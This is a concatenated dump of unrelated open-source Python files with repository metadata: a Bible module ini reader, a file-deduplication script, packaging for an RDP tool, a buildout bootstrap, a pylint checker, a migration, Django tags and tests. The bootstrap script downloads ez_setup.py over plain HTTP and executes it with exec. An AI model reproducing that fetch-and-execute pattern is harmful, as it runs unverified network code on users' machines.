t1.update, values=[{"col1": 5}, {"col1": 7}]
)
| bsd-3-clause | -9,185,482,400,953,730,000 | 36.069753 | 79 | 0.493731 | false |
QProjectOrg/QRepo | src/convertors/base/bqt/initreader.py | 1 | 14171 | # -*- encoding: utf-8 -*-
import datetime
import os
import string
from src.convertors.base.bqt.currentbooksettings import CurrentBookSettings
from src.utils import commonscript
from src.utils.logger import log
from src.convertors.base.bqt.bqtdata import *
from src.utils.common import getFileNameInProperCase
class IniReader():
class CCurrentBookSettings(CurrentBookSettings):
pass
def __init__(self, ini_path):
self.input_filename = ini_path
self.ini_file = file(self.input_filename, 'r')
self.__set_default_values()
def __set_default_values(self):
self.Books = []
self.CurrentBookSettings = self.CCurrentBookSettings()
self.IniDesiredFontName = ""
self.init_values()
def init_data(self, dict_data):
self.ini_type = dict_data.get("IniType")
self.module_type = dict_data.get("ModuleType")
# self.INIEncoding = dict_data.get("INIEncoding")
self.ini_encoding = commonscript.getEncoding(self.input_filename)
self.module_directory = dict_data.get("ModuleDirectory")
def init_values(self):
self.introduction_exist = False
self.strongs_exist = False
self.ini_chapter_zero = 'N'
self.ini_apocrypha = 'N'
self.ini_strong_numbers = 'N'
self.ini_old_testament = ""
self.ini_new_testament = ""
self.ini_copyright = ""
self.ini_categories = ""
self.ini_greek = ""
self.ini_bible = "Y"
self.ini_desired_fontcharset = ""
self.ini_htmlfilter = ""
self.ini_alphabet = ""
self.ini_strongs_dDirectory = ""
self.ini_default_encoding = "utf-8"
self.ini_language = ""
self.ini_desired_fontpath = ""
self.ini_bookqt = 0
self.ini_bookchaptersign = ""
self.ini_bookversesign = ""
self.ini_developer = ""
self.ini_devcontact = ""
self.ini_date = datetime.date.today()
self.ini_version = "1.0"
self.ini_description = ""
self.ini_dict = {}
# разбор bibleqt.ini
def parse_ini(self):
general_settings_parsed = False
self.init_values()
for line in self.ini_file:
# перекодируем строки в UTF-8
line = line.decode(self.ini_encoding).encode('utf_8').strip()
# Line = Line.decode('utf_8').strip()
# обработка основных параметров модуля
if not general_settings_parsed:
general_settings_parsed = self.__parse_general_settings(line)
else:
# обработка параметров конкретной книги модуля
self.__parse_book_settings(line)
def __generate_ini_dict(self):
ini_dict = {}
ini_dict['DesiredFontName'] = self.IniDesiredFontName
ini_dict['BibleName'] = self.HeadBibleName
ini_dict['BibleShortName'] = self.HeadBibleShortName
ini_dict['ChapterZero'] = self.ini_chapter_zero
ini_dict['Apocrypha'] = self.ini_apocrypha
ini_dict['StrongNumbers'] = self.ini_strong_numbers
ini_dict['OldTestament'] = self.ini_old_testament
ini_dict['NewTestament'] = self.ini_new_testament
ini_dict['Copyright'] = self.ini_copyright
ini_dict['Categories'] = self.ini_categories
ini_dict['Greek'] = self.ini_greek
ini_dict['Bible'] = self.ini_bible
ini_dict['DesiredFontCharset'] = self.ini_desired_fontcharset
ini_dict['HTMLFilter'] = self.ini_htmlfilter
ini_dict['Alphabet'] = self.ini_alphabet
ini_dict['StrongsDirectory'] = self.ini_strongs_dDirectory
ini_dict['DefaultEncoding'] = self.ini_default_encoding
ini_dict['Language'] = self.ini_language
ini_dict['DesiredFontPath'] = self.ini_desired_fontpath
ini_dict['BookQt'] = self.ini_bookqt
ini_dict['ChapterSign'] = self.ini_bookchaptersign
ini_dict['VerseSign'] = self.ini_bookversesign
ini_dict['Type'] = self.ini_type
ini_dict['Developer'] = self.ini_developer
ini_dict['DevContact'] = self.ini_devcontact
ini_dict['Date'] = self.ini_date
ini_dict['Version'] = self.ini_version
ini_dict['Description'] = self.ini_description
ini_dict['Books'] = self.Books
return ini_dict
# self.IniDict[''] = self.Ini
def __parse_general_settings(self, line):
# название модуля и короткое название
if line.startswith('BibleName'):
self.HeadBibleName = commonscript.getValue(line)
return False
# название модуля и короткое название
if line.startswith('Bible '):
self.ini_bible = commonscript.getValue(line)
return False
if line.startswith('BibleShortName'):
self.HeadBibleShortName = commonscript.getValue(line)
self.__check_module_name(self.HeadBibleShortName)
if self.module_type == 'Apocrypha':
self.HeadBibleShortName += '-Apocrypha'
return False
# начинается ли в модуле исчисление глав с нуля
if line.startswith('ChapterZero'):
self.ini_chapter_zero = commonscript.getValue(line)
if self.ini_chapter_zero == 'Y':
self.introduction_exist = True
self.OsisWriter.RemakeVersificationProblems()
return False
# считываем признак начала главы в HTML файле
if line.startswith('ChapterSign'):
self.ini_bookchaptersign = commonscript.getValue(line, "ChapterSign")
return False
# считываем копирайт
if line.startswith('Copyright'):
self.ini_copyright = commonscript.getValue(line)
return False
if line.startswith('Alphabet'):
self.ini_alphabet = commonscript.getValue(line)
return False
if line.startswith('HTMLFilter'):
self.ini_htmlfilter = commonscript.getValue(line, "HTMLFilter")
return False
if line.startswith('DesiredFontCharset'):
self.ini_desired_fontcharset = commonscript.getValue(line)
return False
# считываем грееческий
if line.startswith('Greek'):
self.ini_greek = commonscript.getValue(line)
return False
# считываем категории
if line.startswith('Categories'):
self.ini_categories = commonscript.getValue(line)
return False
if line.startswith('StrongsDirectory'):
self.ini_strongs_dDirectory = commonscript.getValue(line)
return False
# считываем признак начала стиха
if line.startswith('VerseSign'):
self.ini_bookversesign = commonscript.getValue(line, "VerseSign")
return False
if line.startswith('DesiredFontName'):
self.IniDesiredFontName = commonscript.getValue(line)
return False
if line.startswith('OldTestament'):
self.ini_old_testament = commonscript.getValue(line)
return False
if line.startswith('NewTestament'):
self.ini_new_testament = commonscript.getValue(line)
return False
# выводим сообщение о том, что программа не обрабатывает апокрифы
if line.startswith('Apocrypha'):
self.ini_apocrypha = commonscript.getValue(line)
if self.ini_apocrypha == 'Y' and \
not self.module_type == 'Apocrypha':
log("""
Скрипт не обрабатывает апокрифы, в связи с тем, что на
данный момент библиотека Sword не поддерживает апокрифы
в библейских модулях. Если вам все же нужны апокрифы, то
запустите скрипт с параметром "--moduletype Apocrypha",
чтобы получить модуль, содержащий только апокрифы в формате
обычной книги.
""")
return False
# определяем наличие в модуле номеров Стронга
if line.startswith('StrongNumbers'):
self.ini_strong_numbers = commonscript.getValue(line)
if self.ini_strong_numbers == 'Y' and self.module_type not in JustBooks:
self.strongs_exist = True
return False
# считываем количество книг
if line.startswith('BookQty'):
self.ini_bookqt = commonscript.getValue(line)
self.IniBookCount = 0
return True
# мои опции
if line.startswith('Description'):
self.ini_description = commonscript.getValue(line)
return False
if line.startswith('Developer'):
self.IniDevelop = commonscript.getValue(line)
return False
if line.startswith('Date'):
self.ini_date = commonscript.getValue(line)
return False
if line.startswith('Version'):
self.ini_version = commonscript.getValue(line)
return False
if line.startswith('Type'):
self.ini_type = commonscript.getValue(line)
return False
def __parse_book_settings(self, line):
# считываем имя файла, относительно текущей директории
if line.startswith('PathName'):
self.CurrentBookSettings.PathName = "book_" + str(self.IniBookCount + 1) + \
'.html'
self.CurrentBookSettings.BookPathToFile = self.module_directory + commonscript.getValue(line)
return
# ищем соответвие длинного названия книги и короткого
if line.startswith('ShortName') and self.module_type != 'Book':
self.CurrentBookSettings.ShortName = commonscript.getValue(line)
if not self.CurrentBookSettings.ShortName:
self.CurrentBookSettings.ShortName = "Empty ShortName"
if not self.CurrentBookSettings.FullName:
self.CurrentBookSettings.FullName = "Empty FullName"
return
# TODO переписать этот блок по нормальному
for Pair in TableBooks:
if Pair[0] in line:
# self.CurrentBookSettings.FullName = Pair[1]
# self.CurrentBookSettings.Testament = Pair[2]
if Pair[2] == 3 and \
not self.module_type == 'Apocrypha':
log('ПРЕДУПРЕЖДЕНИЕ: ', self.CurrentBookSettings.FullName, ' - апокрифическая книга.')
# self.CurrentBookSettings.FullName = ''
elif Pair[2] != 3 and self.module_type == 'Apocrypha':
log('ПРЕДУПРЕЖДЕНИЕ: ' + \
self.CurrentBookSettings.FullName + \
' - каноническая книга.')
# self.CurrentBookSettings.FullName = ''
break
if Pair == TableBooks[len(TableBooks) - 1]:
# self.CurrentBookSettings.FullName = Pair[1]
# self.CurrentBookSettings.FullName = commonscript.getValue(Line)
log('Ошибка, не найдено название книги "' + self.CurrentBookSettings.FullName + '"')
# сохраняем название книги
if line.startswith('FullName') and (self.module_type != 'Dictionary'):
self.CurrentBookSettings.FullName = commonscript.getValue(line)
return False
# переходим к чтению файла книги
if line.startswith('ChapterQty') and self.CurrentBookSettings.FullName != '':
if os.path.exists(getFileNameInProperCase(self.CurrentBookSettings.BookPathToFile)):
self.CurrentBookSettings.BookPathToFile = getFileNameInProperCase(
self.CurrentBookSettings.BookPathToFile)
BookFile = file(getFileNameInProperCase(self.CurrentBookSettings.BookPathToFile), 'r')
self.CurrentBookSettings.ChapterQty = commonscript.getValue(line)
# печатаем книгу в ini файл
log('Обрабатываю файл ' + self.CurrentBookSettings.BookPathToFile)
self.CurrentBookSettings.Encoding = commonscript.getEncoding(self.CurrentBookSettings.BookPathToFile)
self.CurrentBookSettings.ChapterSign = self.ini_bookchaptersign
self.Books.append(self.CurrentBookSettings)
self.CurrentBookSettings = self.CCurrentBookSettings()
self.IniBookCount += 1
BookFile.close()
else:
print "Not found file " + getFileNameInProperCase(self.CurrentBookSettings.BookPathToFile)
def __check_module_name(self, name):
for i in xrange(0, len(name)):
if not name[i] in string.printable:
log('ПРЕДУПРЕЖДЕНИЕ: имя модуля содержит нелатинские\n'
'символы. Итоговый модуль Sword не будет работать\n'
'в некоторых фронтендах. Например BibleTime.\n')
return
def get_ini_info(self):
return self.__generate_ini_dict() | mit | -3,103,329,302,460,644,400 | 39.603715 | 117 | 0.600885 | false |
mattmakesmaps/opencv-junk | opencv-utils/bin/delete_dupes.py | 1 | 1635 | import argparse
import os
import sys
def get_abs_path(in_path):
"""
Given a relative or absolute path, return the absolute path.
:param in_path:
:return:
"""
if os.path.isabs(in_path):
return in_path
else:
return os.path.abspath(in_path)
if __name__ == '__main__':
# Define command line interface
parser = argparse.ArgumentParser(description='Given a source and target directory, '
'if files are present in the source, delete from the target.')
parser.add_argument('source_path', help="Path containing source files.", action="store")
parser.add_argument('target_path', help="Path containing files to delete if they appear in source.", action="store")
parser.add_argument('--dry-run', help="Don't delete, just output files marked for delete.",
action="store_true", default=False)
args = parser.parse_args()
full_source_path = get_abs_path(args.source_path)
full_target_path = get_abs_path(args.target_path)
source_files = os.listdir(full_source_path)
target_files = os.listdir(full_target_path)
if args.dry_run:
sys.stdout.write("DRY RUN: NO FILES WILL BE DELETED\n")
else:
sys.stdout.write("WARNING: THE FOLLOWING FILES WILL BE DELETED\n")
for source_file in source_files:
if source_file in target_files:
target_file = os.path.join(full_target_path, source_file)
sys.stdout.write("%s\n" % target_file)
# Real Run, Delete Files
if not args.dry_run:
os.remove(target_file)
| mit | -7,510,965,942,031,719,000 | 37.023256 | 120 | 0.625076 | false |
ChrisTruncer/rdpy | setup.py | 1 | 1335 | #!/usr/bin/env python
import setuptools
from distutils.core import setup, Extension
setup(name='rdpy',
version='1.3.2',
description='Remote Desktop Protocol in Python',
long_description="""
RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (Client and Server side). RDPY is built over the event driven network engine Twisted.
RDPY provide RDP and VNC binaries : RDP Man In The Middle proxy which record session, RDP Honeypot, RDP screenshoter, RDP client, VNC client, VNC screenshoter, RSS Player
""",
author='Sylvain Peyrefitte',
author_email='[email protected]',
url='https://github.com/citronneur/rdpy',
packages=[
'rdpy',
'rdpy.core',
'rdpy.security',
'rdpy.protocol',
'rdpy.protocol.rdp',
'rdpy.protocol.rdp.pdu',
'rdpy.protocol.rdp.nla',
'rdpy.protocol.rdp.t125',
'rdpy.protocol.rfb',
'rdpy.ui'
],
ext_modules=[Extension('rle', ['ext/rle.c'])],
scripts = [
'bin/rdpy-rdpclient.py',
'bin/rdpy-rdphoneypot.py',
'bin/rdpy-rdpmitm.py',
'bin/rdpy-rdpscreenshot.py',
'bin/rdpy-rssplayer.py',
'bin/rdpy-vncclient.py',
'bin/rdpy-vncscreenshot.py'
],
install_requires=[
'twisted',
'pyopenssl',
'service_identity',
'qt4reactor',
'rsa',
'pyasn1',
],
)
| gpl-3.0 | 5,683,158,288,272,969,000 | 27.404255 | 179 | 0.659176 | false |
motmot/flymovieformat | bootstrap.py | 1 | 2578 | ##############################################################################
#
# Copyright (c) 2006 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Bootstrap a buildout-based project
Simply run this script in a directory containing a buildout.cfg.
The script accepts buildout command-line options, so you can
use the -c option to specify an alternate configuration file.
$Id$
"""
import os, shutil, sys, tempfile, urllib2
tmpeggs = tempfile.mkdtemp()
is_jython = sys.platform.startswith("java")
try:
import pkg_resources
except ImportError:
ez = {}
exec(urllib2.urlopen("http://peak.telecommunity.com/dist/ez_setup.py").read(), ez)
ez["use_setuptools"](to_dir=tmpeggs, download_delay=0)
import pkg_resources
if sys.platform == "win32":
def quote(c):
if " " in c:
return '"%s"' % c # work around spawn lamosity on windows
else:
return c
else:
def quote(c):
return c
cmd = "from setuptools.command.easy_install import main; main()"
ws = pkg_resources.working_set
if is_jython:
import subprocess
assert (
subprocess.Popen(
[sys.executable]
+ ["-c", quote(cmd), "-mqNxd", quote(tmpeggs), "zc.buildout"],
env=dict(
os.environ,
PYTHONPATH=ws.find(
pkg_resources.Requirement.parse("setuptools")
).location,
),
).wait()
== 0
)
else:
assert (
os.spawnle(
os.P_WAIT,
sys.executable,
quote(sys.executable),
"-c",
quote(cmd),
"-mqNxd",
quote(tmpeggs),
"zc.buildout",
dict(
os.environ,
PYTHONPATH=ws.find(
pkg_resources.Requirement.parse("setuptools")
).location,
),
)
== 0
)
ws.add_entry(tmpeggs)
ws.require("zc.buildout")
import zc.buildout.buildout
zc.buildout.buildout.main(sys.argv[1:] + ["bootstrap"])
shutil.rmtree(tmpeggs)
| bsd-3-clause | -4,471,996,207,131,079,000 | 25.040404 | 86 | 0.559348 | false |
ruchee/vimrc | vimfiles/bundle/vim-python/submodules/pylint/pylint/checkers/refactoring/len_checker.py | 1 | 4298 | # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/LICENSE
from typing import List
import astroid
from pylint import checkers, interfaces
from pylint.checkers import utils
class LenChecker(checkers.BaseChecker):
"""Checks for incorrect usage of len() inside conditions.
Pep8 states:
For sequences, (strings, lists, tuples), use the fact that empty sequences are false.
Yes: if not seq:
if seq:
No: if len(seq):
if not len(seq):
Problems detected:
* if len(sequence):
* if not len(sequence):
* elif len(sequence):
* elif not len(sequence):
* while len(sequence):
* while not len(sequence):
* assert len(sequence):
* assert not len(sequence):
* bool(len(sequence))
"""
__implements__ = (interfaces.IAstroidChecker,)
# configuration section name
name = "refactoring"
msgs = {
"C1801": (
"Do not use `len(SEQUENCE)` without comparison to determine if a sequence is empty",
"len-as-condition",
"Used when Pylint detects that len(sequence) is being used "
"without explicit comparison inside a condition to determine if a sequence is empty. "
"Instead of coercing the length to a boolean, either "
"rely on the fact that empty sequences are false or "
"compare the length against a scalar.",
)
}
priority = -2
options = ()
@utils.check_messages("len-as-condition")
def visit_call(self, node):
# a len(S) call is used inside a test condition
# could be if, while, assert or if expression statement
# e.g. `if len(S):`
if not utils.is_call_of_name(node, "len"):
return
# the len() call could also be nested together with other
# boolean operations, e.g. `if z or len(x):`
parent = node.parent
while isinstance(parent, astroid.BoolOp):
parent = parent.parent
# we're finally out of any nested boolean operations so check if
# this len() call is part of a test condition
if not utils.is_test_condition(node, parent):
return
len_arg = node.args[0]
generator_or_comprehension = (
astroid.ListComp,
astroid.SetComp,
astroid.DictComp,
astroid.GeneratorExp,
)
if isinstance(len_arg, generator_or_comprehension):
# The node is a generator or comprehension as in len([x for x in ...])
self.add_message("len-as-condition", node=node)
return
try:
instance = next(len_arg.infer())
except astroid.InferenceError:
# Probably undefined-varible, abort check
return
mother_classes = self.base_classes_of_node(instance)
affected_by_pep8 = any(
t in mother_classes for t in ["str", "tuple", "list", "set"]
)
if "range" in mother_classes or (
affected_by_pep8 and not self.instance_has_bool(instance)
):
self.add_message("len-as-condition", node=node)
@staticmethod
def instance_has_bool(class_def: astroid.ClassDef) -> bool:
try:
class_def.getattr("__bool__")
return True
except astroid.AttributeInferenceError:
...
return False
@utils.check_messages("len-as-condition")
def visit_unaryop(self, node):
"""`not len(S)` must become `not S` regardless if the parent block
is a test condition or something else (boolean expression)
e.g. `if not len(S):`"""
if (
isinstance(node, astroid.UnaryOp)
and node.op == "not"
and utils.is_call_of_name(node.operand, "len")
):
self.add_message("len-as-condition", node=node)
@staticmethod
def base_classes_of_node(instance: astroid.nodes.ClassDef) -> List[astroid.Name]:
"""Return all the classes names that a ClassDef inherit from including 'object'."""
try:
return [instance.name] + [x.name for x in instance.ancestors()]
except TypeError:
return [instance.name]
| mit | -7,659,394,172,842,702,000 | 34.520661 | 98 | 0.597953 | false |
fanchunke1991/flask_website | migrations/versions/d8d1b418f41c_.py | 1 | 1046 | """empty message
Revision ID: d8d1b418f41c
Revises: 7f5c9e993be1
Create Date: 2017-02-15 21:03:05.958000
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd8d1b418f41c'
down_revision = '7f5c9e993be1'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('profiles',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('nickname', sa.String(length=10), nullable=False),
sa.Column('gender', sa.String(length=4), nullable=False),
sa.Column('address', sa.String(length=4), nullable=True),
sa.Column('discription', sa.Text(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('profiles')
# ### end Alembic commands ###
| mit | -7,483,645,544,517,779,000 | 27.27027 | 65 | 0.670172 | false |
taedori81/gentlecoffee | home/templatetags/gentlecoffee_tags.py | 1 | 2563 | from django import template
from ..models import Area
register = template.Library()
@register.assignment_tag(takes_context=True)
def get_site_root(context):
return context['request'].site.root_page
@register.inclusion_tag("home/navbar/navbar.html", takes_context=True)
def display_navbar(context):
parent = get_site_root(context)
if context.has_key('self'):
calling_page = context['self']
else:
calling_page = None
menuitems = parent.get_children().live().in_menu()
for menuitem in menuitems:
menuitem.show_dropdown = menuitem.get_children().live().in_menu().exists()
menuitem.active = (calling_page.url.startswith(menuitem.url) if calling_page else False)
return {
"calling_page": calling_page,
"menuitems": menuitems,
"request": context['request']
}
@register.inclusion_tag('home/navbar/navbar_dropdown.html', takes_context=True)
def display_navbar_dropdown(context, parent):
menuitems_children = parent.get_children().live().in_menu()
return {
"parent": parent,
"menuitems_children": menuitems_children,
"request": context['request'],
}
@register.inclusion_tag('home/include/side_menu_area.html', takes_context=True)
def display_side_menu_area(context):
request = context['request']
areas = Area.objects.all()
# TODO Need to build href for filter the page
area_items = []
for area in areas:
item_name = area.area_name
item_href = '?area=' + item_name
area_items.append({"name": item_name, "href": item_href})
return {
"request": request,
"areas": areas,
"area_items": area_items
}
@register.filter
def url_param_dict_to_list(url_items_dict):
"""Turn this dictionary into a param list for the URL"""
params_list = ""
for key,value in url_items_dict:
if key != "page":
params_list += "&%s=%s" % (key, value)
return params_list
@register.filter
def get_item(dictionary, key):
return dictionary.get(key)
@register.inclusion_tag('home/include/blog_item.html', takes_context=True)
def display_blog_list(context, blog_list):
blogs = []
for blog in blog_list:
for block in blog.body:
if block.block_type == 'heading':
blog.heading = block.value
if block.block_type == 'photo':
blog.photo = block.value
blogs.append(blog)
request = context['request']
return {
"request": request,
"blogs": blogs,
}
| bsd-3-clause | 5,064,137,035,026,292,000 | 26.265957 | 96 | 0.630121 | false |
garethr/django-project-templates | setup.py | 1 | 1174 | from setuptools import setup, find_packages
import os
setup(
name='django-project-templates',
version = "0.11",
description="Paster templates for creating Django projects",
author='Gareth Rushgrove',
author_email='[email protected]',
url='http://github.com/garethr/django-project-templates/',
packages = find_packages('src'),
package_dir = {'':'src'},
license = "MIT",
keywords = "django paster",
install_requires=[
'setuptools',
'PasteScript>=1.3',
'Cheetah',
'fabric',
],
include_package_data=True,
zip_safe=False,
entry_points="""
[paste.paster_create_template]
django_project=django_project_templates.pastertemplates:DjangoProjectTemplate
django_cruisecontrol_project=django_project_templates.pastertemplates:DjangoCruiseControlTemplate
newsapps_project=django_project_templates.pastertemplates:NewsAppsProjectTemplate
""",
classifiers = [
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
'Operating System :: OS Independent',
'Programming Language :: Python',
],
)
| mit | -1,137,145,708,265,585,200 | 32.542857 | 105 | 0.66184 | false |
migasfree/migasfree-backend | migasfree/client/models/fault.py | 1 | 4720 | # -*- coding: utf-8 -*-
# Copyright (c) 2015-2021 Jose Antonio Chavarría <[email protected]>
# Copyright (c) 2015-2021 Alberto Gacías <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
from django.db.models.aggregates import Count
from django.utils.translation import gettext_lazy as _
from ...core.models import Project
from .event import Event
from .fault_definition import FaultDefinition
class DomainFaultManager(models.Manager):
def get_queryset(self):
return super().get_queryset().select_related(
'project',
'fault_definition',
'computer',
'computer__project',
'computer__sync_user',
)
def scope(self, user):
qs = self.get_queryset()
if user and not user.is_view_all():
qs = qs.filter(
project_id__in=user.get_projects(),
computer_id__in=user.get_computers()
)
return qs
class UncheckedManager(DomainFaultManager):
def get_queryset(self):
return super().get_queryset().filter(checked=0)
def scope(self, user):
qs = super().scope(user).filter(checked=0)
if user:
qs = qs.filter(models.Q(fault_definition__users__id__in=[user.id, ])
| models.Q(fault_definition__users=None))
else:
qs = qs.filter(fault_definition__users=None)
return qs
class FaultManager(DomainFaultManager):
def create(self, computer, definition, result):
obj = Fault()
obj.computer = computer
obj.project = computer.project
obj.fault_definition = definition
obj.result = result
obj.save()
return obj
class Fault(Event):
USER_FILTER_CHOICES = (
('me', _('To check for me')),
('only_me', _('Assigned to me')),
('others', _('Assigned to others')),
('unassigned', _('Unassigned')),
)
fault_definition = models.ForeignKey(
FaultDefinition,
on_delete=models.CASCADE,
verbose_name=_("fault definition")
)
result = models.TextField(
verbose_name=_("result"),
null=True,
blank=True
)
checked = models.BooleanField(
verbose_name=_("checked"),
default=False,
)
project = models.ForeignKey(
Project,
on_delete=models.CASCADE,
verbose_name=_("project")
)
objects = FaultManager()
unchecked = UncheckedManager()
@staticmethod
def unchecked_count(user=None):
queryset = Fault.unchecked.scope(user)
if user:
queryset = queryset.filter(
models.Q(fault_definition__users__id__in=[user.id, ])
| models.Q(fault_definition__users=None)
)
return queryset.count()
@staticmethod
def unchecked_by_project(user):
total = Fault.unchecked_count(user)
projects = list(Fault.unchecked.scope(user).values(
'project__name',
'project__id',
'project__platform__id',
).annotate(
count=Count('id')
).order_by('project__platform__id', '-count'))
platforms = list(Fault.unchecked.scope(user).values(
'project__platform__id',
'project__platform__name'
).annotate(
count=Count('id')
).order_by('project__platform__id', '-count'))
return {
'total': total,
'inner': platforms,
'outer': projects,
}
@staticmethod
def group_by_definition(user=None):
return Fault.objects.scope(user).values(
'fault_definition__id', 'fault_definition__name'
).annotate(
count=models.aggregates.Count('fault_definition__id')
).order_by('-count')
def checked_ok(self):
self.checked = True
self.save()
def list_users(self):
return self.fault_definition.list_users()
class Meta:
app_label = 'client'
verbose_name = _('Fault')
verbose_name_plural = _('Faults')
| gpl-3.0 | 4,239,233,166,619,057,000 | 27.421687 | 80 | 0.597075 | false |
skurtapp/django-rest-framework-jwt | setup.py | 1 | 3378 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import shutil
import sys
from setuptools import setup
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
with open(os.path.join(package, '__init__.py'), 'rb') as init_py:
src = init_py.read().decode('utf-8')
return re.search("__version__ = ['\"]([^'\"]+)['\"]", src).group(1)
name = 'skurt-djangorestframework-jwt'
version = get_version('skurt_rest_framework_jwt')
package = 'skurt_rest_framework_jwt'
description = 'JSON Web Token based authentication for Django REST framework'
url = 'https://github.com/skurtapp/django-rest-framework-jwt'
author = 'Jose Padilla'
author_email = '[email protected]'
license = 'MIT'
install_requires = [
'PyJWT>=1.4.0,<2.0.0'
]
def read(*paths):
"""
Build a file path from paths and return the contents.
"""
with open(os.path.join(*paths), 'r') as f:
return f.read()
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
if sys.argv[-1] == 'publish':
if os.system('pip freeze | grep wheel'):
print('wheel not installed.\nUse `pip install wheel`.\nExiting.')
sys.exit()
if os.system('pip freeze | grep twine'):
print('twine not installed.\nUse `pip install twine`.\nExiting.')
sys.exit()
os.system('python setup.py sdist bdist_wheel')
os.system('twine upload dist/*')
shutil.rmtree('dist')
shutil.rmtree('build')
shutil.rmtree('skurt_djangorestframework_jwt.egg-info')
print('You probably want to also tag the version now:')
print(" git tag -a {0} -m 'version {0}'".format(version))
print(' git push --tags')
sys.exit()
setup(
name=name,
version=version,
url=url,
license=license,
description=description,
long_description=read('README.rst'),
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
install_requires=install_requires,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP',
]
)
| mit | 6,180,108,985,916,996,000 | 29.160714 | 77 | 0.617229 | false |
deets/clang-complete | tests/test_async_api.py | 1 | 2891 | import os
import tempfile
from unittest import TestCase
from cStringIO import StringIO
from clangcomplete.libclang import setup
from clangcomplete.api import (
mainloop,
AsyncSession,
)
from clangcomplete.util import source_for_autocomplete
TEST_SOURCE = """
struct Foo {
int bar;
int baz;
};
int main(int argc, const char* argv) {
// Some comment
Foo foo;
foo./*POINT*/
return 0;
}
"""
TEST_SOURCE_WITH_INCLUDE = """
#include "foo.hh"
int main(int argc, char** argv) {
Foo foo;
foo./*POINT*/
}
"""
TEST_INCLUDE = """
struct Foo {
int bar;
int baz;
int padamm;
};
"""
class TestAsyncAPI(TestCase):
def setUp(self):
setup()
def test_mainloop(self):
inf = StringIO("SHUTDOWN\n")
outf = StringIO()
mainloop("test.c", [], inf, outf)
def test_sourcefile_cmd(self):
session = AsyncSession("test.c", [])
source = TEST_SOURCE
inf = StringIO("source_length:%i\n%s\n\n" % (len(source), source))
outf = StringIO()
session.sourcefile(inf, outf)
self.assertEqual(
source,
session.source,
)
def test_completion(self):
session = AsyncSession("test.c", [])
with session:
point, source = source_for_autocomplete(TEST_SOURCE)
inf = StringIO("row:%i\ncolumn:%i\nsource_length:%i\n%s\n\n" %
(point[0], point[1], len(source), source))
outf = StringIO()
session.completion(inf, outf)
content = outf.getvalue()
assert content.endswith("$")
assert "COMPLETION: bar" in content
assert "COMPLETION: baz" in content
def test_cmdline_args(self):
session = AsyncSession("test.c", [])
with session:
assert not session.args
args = ["-Ifoobarbaz", "-Ipadam"]
inf = StringIO("num_args:%i\n%s\n" % (len(args), " ".join(args)))
outf = StringIO()
session.cmdlineargs(inf, outf)
self.assertEqual(
args,
session.args,
)
def test_completion_with_args(self):
incdir = tempfile.mkdtemp()
with open(os.path.join(incdir, "foo.hh"), "w") as outf:
outf.write(TEST_INCLUDE)
session = AsyncSession("test.c", ["-I%s" % incdir])
with session:
point, source = source_for_autocomplete(TEST_SOURCE_WITH_INCLUDE)
inf = StringIO("row:%i\ncolumn:%i\nsource_length:%i\n%s\n\n" %
(point[0], point[1], len(source), source))
outf = StringIO()
session.completion(inf, outf)
content = outf.getvalue()
assert content.endswith("$")
assert "COMPLETION: bar" in content
assert "COMPLETION: baz" in content
| mit | 5,010,866,645,818,686,000 | 23.709402 | 77 | 0.552058 | false |
mbohlool/client-python | kubernetes/test/test_policy_v1beta1_api.py | 1 | 2822 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.apis.policy_v1beta1_api import PolicyV1beta1Api
class TestPolicyV1beta1Api(unittest.TestCase):
